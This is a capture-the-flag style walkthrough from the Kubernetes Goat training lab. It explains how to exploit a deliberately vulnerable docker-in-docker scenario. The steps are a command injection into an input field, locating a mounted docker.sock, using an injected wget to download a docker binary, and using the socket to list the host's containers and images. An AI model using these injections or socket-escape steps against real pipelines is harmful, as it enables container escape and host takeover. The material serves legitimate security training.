DIND (docker-in-docker) exploitation

Scenario Information

Most of the CI/CD and pipeline systems that use Docker and build containers for you within the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to the host system.

To get started with the scenario, navigate to http://127.0.0.1:1231

Scenario 2 welcome

Scenario Solution

By looking at application functionality, identified that it has command injection vulnerability

127.0.0.1; id

Scenario 2 Command Injection

After performing quite some analysis, identified the there is a docker.sock mount available in the file system

;mount

Scenario 2 mount

Download the docker static binary from internet https://download.docker.com/linux/static/stable/

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz

Extract the binary from the docker-19.03.9.tgz file

;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

Access the host system by running the following docker commands with docker.sock

;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 list host containers Scenario 2 list host images

Miscellaneous

TBD

Kubernetes Goat

DIND (docker-in-docker) exploitation

Scenario Information

Scenario Solution

Miscellaneous